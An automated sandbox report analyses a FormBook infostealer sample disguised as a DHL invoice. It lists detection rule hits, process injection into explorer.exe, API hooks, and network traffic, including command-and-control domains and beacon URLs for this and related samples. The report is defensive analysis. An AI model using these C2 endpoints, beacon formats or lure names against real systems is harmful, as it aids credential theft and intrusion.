                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 92.122.145.220
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532858/sample/invoice dhl.delivery document and original invoice sign.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:57:23API Interceptor1x Sleep call for process: invoice dhl.delivery document and original invoice sign.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  44.227.76.166draft_inv dec21.exeGet hashmaliciousBrowse
                  • www.apps365.one/n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p
                  GV20.xlsxGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?g2=3MX+rG6qdMdpgj3vkcjGUKQb8RZ/Wti45jKeFUgZ8Sp9kre80Lf7BBErzfoB75v9CaDIsg==&cL30r=9rotn4JHoV3ltP8
                  DHL Documents.exeGet hashmaliciousBrowse
                  • www.dazzlehide.com/how6/?l2Jl=zrWVDLIDcIqBKRYG1UA+Wpo4WhIstAWIPVtKBtZyKgnKFq7ePhcu8NeTnhol46ILoLGp&Tf5pq=W6zlk8Rp
                  InfoDoc-TGT23.xlsxGet hashmaliciousBrowse
                  • www.motan.one/e9gd/?kbMpZrx=1Tx/x2BtnTfqhKNFsgzrN2ChDpvRrwmThrJ1L/NufEAFSHMFfBw+pnINnQuUZ1NWw2fceQ==&1b=iHN83
                  Tax payment invoice - Wed, November 10, 2021,pdf.exeGet hashmaliciousBrowse
                  • www.auribunk.com/e3rs/?mf=TRvZRMAw3lsKUL9CXC8eqAI5bRo13x6FqkgJspROms4gTvW8iipg2M7S/NGvrxuIEdWN&Nzut=7ni4n2oPNjQ
                  Quote request.exeGet hashmaliciousBrowse
                  • www.dietjakarta.com/s2qi/?B4Zpg=n2MLk&TJELpfLP=qOzazkHAVvIGDra8b9OWW7CQPYry4NAftY2oZLUdYfYDTW+xNyVbwU9NOeXebbzy0cbp
                  HCCuazHtYM.exeGet hashmaliciousBrowse
                  • www.kisah.xyz/sywu/?Wdcl=USn/s/Nyq2IB4uI+SZdH7vYZi5cG3dzFHZJ6S+kDyK7ak+Qptb1BIkroqQUbeC08Hzvk&f0=6lux
                  AhsMBcI8HE.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?FDK=8pHld4yh&IBZp=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw5kHwI72X83/
                  EyCIJOX8SE.exeGet hashmaliciousBrowse
                  • www.zerw2.com/q36e/?7nAP7b=Rntl1NDFA6KYRcsqazHh+Zc5uliS6OLgFgzbWqR6HwMZQd5uPPAwi9BbZn8pw0w7Jz4p&2dxhP=9rl0db
                  Purchase Order_pdf.exeGet hashmaliciousBrowse
                  • www.sharpabode.com/m46c/?vZY8T=cbYwwDYfq0EA1/dzvh5+5q31ws3piQ0R8cWk1s43hoFTk6H0f8stk5G5Q6DD0FZfegy9&eDKpqJ=4hlLdHAHW
                  Jrc9iR2XxH.exeGet hashmaliciousBrowse
                  • www.cerulecode.com/fpdi/?HfW=Y4i9pRfqC0VEN73682mG/jD+Vu59I4hEkdMs70p216zZ0VDsaaS5oQ0h3VnsQu+aBNhS&SF=4huTiLj0U
                  Purchase Order-10,000MT.exeGet hashmaliciousBrowse
                  • www.brunchy.one/z4m5/?0BZ=zNPWEz3pIEHibvS4bsIXDPiznK4rKMrVGAhmY+HWnOPy3ASb809gbr8Dwg2gtflOJLni&GrTx=OBZlGh08BLVtF
                  Draft shipping docs CI+PL.xlsxGet hashmaliciousBrowse
                  • www.innoattic.com/bs8f/?cB=g8xx_j&8p=gPvbgkUuDHvxuJMOi3Tla1oGEdPTt04jzJFwq+zy+XCPeJFywCVHj+bsawhRKX7OnQxPtw==
                  INQ No.KP-30-00-PS-PI-INQ-0044.exeGet hashmaliciousBrowse
                  • www.keenlodge.com/z4m5/?IbWD=IxgNhcPCMNp9bV879hJPaVaLt/F9tNvz+B8dWaixPZ5v/4GUpiSAT9d+tp3lIab/iqeX&u48=-ZxdAxW
                  1908790.exeGet hashmaliciousBrowse
                  • www.fleetizer.com/fg6s/?6lUXCh2=IckWWdKyCvbUOE8Ak+7kGAJP2dTotOIdi/VcdgZTnhZBerDYh6qAkCj/DPMztv+2yYxp&oL3Lu=a4mDHl20kLKlY
                  eLL1MVwOME.exeGet hashmaliciousBrowse
                  • www.kisah.xyz/sywu/?BR=USn/s/Nyq2IB4uI+SZdH7vYZi5cG3dzFHZJ6S+kDyK7ak+Qptb1BIkroqQUxByE8Dxnk&bN90g=JTsp4zoP3f
                  IRFdB0zpoK.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?GJEXK=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&Zl=5jBl74npBZ
                  PpyXtBdTaF.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?o0GTN=cL3PcjiPVroHY&0VltihtH=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4
                  9QqkVnhDbm.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?4h68ir=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&n2=YHstuLSPt
                  bPlX6IObw2.exeGet hashmaliciousBrowse
                  • www.fleetton.com/fqiq/?aJExY=5juP-hz0rVndupn&W488=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6E9gZbONbW4

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  pixie.porkbun.comEyCIJOX8SE.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  TRJViVkvTr.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Production Inquiry.xlsxGet hashmaliciousBrowse
                  • 44.227.65.245
                  NEW ORDER.docGet hashmaliciousBrowse
                  • 44.227.65.245
                  BIN.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  v02dyhbaq5.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  TT COPY_11010089.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  I6B6iC23da.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  08-14.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  Swift Copy.xlsxGet hashmaliciousBrowse
                  • 44.227.76.166
                  VESSEL BOOKING DETAILS_pdf.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  OoBepaLH3W.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  INVOICES.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  Transfer Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  productos.exeGet hashmaliciousBrowse
                  • 44.227.65.245
                  QxVf0A9SFT.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Inv_7623980.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Inv_7623980.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Tlz3P6ra10.exeGet hashmaliciousBrowse
                  • 44.227.76.166
                  Order210622.exeGet hashmaliciousBrowse
                  • 44.227.76.166

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  AMAZON-02USoeOZvHnuaUGet hashmaliciousBrowse
                  • 54.171.230.55
                  Milleniumbpc.xlsxGet hashmaliciousBrowse
                  • 44.231.165.140
                  PQPv91RexGGet hashmaliciousBrowse
                  • 34.249.145.219
                  WAYBILL 44 7611 9546 - Joao Carlos.exeGet hashmaliciousBrowse
                  • 75.2.115.196
                  HBL No_PZU100035300.xlsxGet hashmaliciousBrowse
                  • 3.64.163.50
                  ufKi6DmWMQCuEb4.exeGet hashmaliciousBrowse
                  • 3.108.154.143
                  yVvATSvedsfMg0l.exeGet hashmaliciousBrowse
                  • 3.64.163.50
                  'Vm Note'ar_dept On Wed, 01 Dec 2021 220320 +0100.htmlGet hashmaliciousBrowse
                  • 52.84.148.85
                  EmployeeAssessment.htmlGet hashmaliciousBrowse
                  • 108.157.4.48
                  bUSzS84fr4.dllGet hashmaliciousBrowse
                  • 205.251.242.103
                  M72Kclc67w.dllGet hashmaliciousBrowse
                  • 13.225.75.74
                  5jsO2t1pju.dllGet hashmaliciousBrowse
                  • 13.225.75.74
                  4bndVtKthy.dllGet hashmaliciousBrowse
                  • 13.225.75.74
                  8frEuSow0b.exeGet hashmaliciousBrowse
                  • 13.58.157.220
                  dDGwIMJCU9.exeGet hashmaliciousBrowse
                  • 3.22.15.135
                  NtJEv6gABB.exeGet hashmaliciousBrowse
                  • 3.22.15.135
                  e6o8rHLN98.exeGet hashmaliciousBrowse
                  • 3.22.15.135
                  Poh Tiong Trading - products list.exeGet hashmaliciousBrowse
                  • 52.209.14.22
                  dowNext.dllGet hashmaliciousBrowse
                  • 13.224.92.74
                  'Vm Note'usename On Wed, 01 Dec 2021 192129 +0100.htmlGet hashmaliciousBrowse
                  • 13.224.96.22

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.log
                  Process:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1310
                  Entropy (8bit):5.345651901398759
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                  MD5:D918C6A765EDB90D2A227FE23A3FEC98
                  SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                  SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                  SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.790881583355775
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:invoice dhl.delivery document and original invoice sign.exe
                  File size:449536
                  MD5:ebce26da75669d94dbc0550bf394b204
                  SHA1:bcc8f769e51cd9f8a160e58840f80a008e2b72e2
                  SHA256:5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
                  SHA512:0e87adccb6d3ca4ea2ee2e101a20ea81437e3f774dd3296c264c92ce763adacacbe1a8a4b9b6226c0b8403569c716fd5fcc55820ea4a0575172d396bae432ed0
                  SSDEEP:12288:pY6XjcPK3hl0If0PufZptLKxO5J/jJUf7b3:LXjSKgIf8ufTtLPlqfP
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i..a................................. ........@.. .......................@............@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x46f0be
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61A89569 [Thu Dec 2 09:44:09 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6f0640x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x4c0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x6d0c40x6d200False0.883519473081data7.80084963355IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc0x700000x4c00x600False0.37890625data4.67278801338IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x720000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0x700a00x26cdata
                  RT_MANIFEST0x7030c0x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Version Infos

                  DescriptionData
                  Translation0x0000 0x04b0
                  LegalCopyright
                  Assembly Version0.0.0.0
                  InternalNameCMSFILEWRITABLETY.exe
                  FileVersion0.0.0.0
                  ProductVersion0.0.0.0
                  FileDescription
                  OriginalFilenameCMSFILEWRITABLETY.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 18:58:54.959861994 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.153683901 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.153938055 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.346704960 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.346857071 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.539767981 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.542661905 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.542689085 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.542970896 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.542995930 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.735187054 CET804979244.227.76.166192.168.2.6

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 18:58:54.919909000 CET5033953192.168.2.68.8.8.8
                  Dec 2, 2021 18:58:54.948086977 CET53503398.8.8.8192.168.2.6
                  Dec 2, 2021 18:59:16.066459894 CET6330753192.168.2.68.8.8.8
                  Dec 2, 2021 18:59:16.090806007 CET53633078.8.8.8192.168.2.6

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Dec 2, 2021 18:58:54.919909000 CET192.168.2.68.8.8.80x5c14Standard query (0)www.federaldados.designA (IP address)IN (0x0001)
                  Dec 2, 2021 18:59:16.066459894 CET192.168.2.68.8.8.80xb04dStandard query (0)www.mimamincloor.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Dec 2, 2021 18:58:54.948086977 CET8.8.8.8192.168.2.60x5c14No error (0)www.federaldados.designpixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET8.8.8.8192.168.2.60x5c14No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET8.8.8.8192.168.2.60x5c14No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)
                  Dec 2, 2021 18:59:16.090806007 CET8.8.8.8192.168.2.60xb04dName error (3)www.mimamincloor.comnonenoneA (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.federaldados.design

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.64979244.227.76.16680C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 2, 2021 18:58:55.346857071 CET11717OUTGET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1
                  Host: www.federaldados.design
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Dec 2, 2021 18:58:55.542661905 CET11717INHTTP/1.1 307 Temporary Redirect
                  Server: openresty
                  Date: Thu, 02 Dec 2021 17:58:55 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 168
                  Connection: close
                  Location: http://federaldados.design
                  X-Frame-Options: sameorigin
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function NameHook TypeActive in Processes
                  PeekMessageAINLINEexplorer.exe
                  PeekMessageWINLINEexplorer.exe
                  GetMessageWINLINEexplorer.exe
                  GetMessageAINLINEexplorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function NameHook TypeNew Data
                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: invoice dhl.delivery document and original invoice sign.exe PID: 3452 Parent PID: 6056

                  General

                  Start time:18:57:22
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x4e0000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Chronological Activities

                  Analysis Process: invoice dhl.delivery document and original invoice sign.exe PID: 6188 Parent PID: 3452

                  General

                  Start time:18:57:26
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Imagebase:0x990000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Chronological Activities

                  Analysis Process: explorer.exe PID: 3440 Parent PID: 6188

                  General

                  Start time:18:57:29
                  Start date:02/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
